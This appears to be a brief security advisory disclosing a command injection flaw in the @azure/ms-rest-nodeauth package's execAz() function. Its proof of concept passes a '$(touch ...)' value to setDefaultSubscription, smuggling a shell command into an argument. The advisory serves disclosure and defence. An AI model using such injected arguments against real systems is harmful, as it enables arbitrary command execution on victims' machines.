Command Injection in azure/ms-rest-nodeauth
Mar 9th 2021
the core function execAz() which is purposely used for az command can be injected with arbitrary other OS commands. Also the attackers can exploit this vulnerability by calling AzureCliCredentials.setDefaultSubscription("OS command") from the Azure CLI.
🕵️♂️ Proof of Concept
// PoC.js auth = require('@azure/ms-rest-nodeauth'); auth.AzureCliCredentials.setDefaultSubscription('$(touch pzhou@shu)');
then the illegal file pzhou@shu can be created.
This vulnerability is capable of executing arbitrary OS commands injected by the Azure CLI users or the network users in case some developers use the Azure CLI as a proxy or middleware.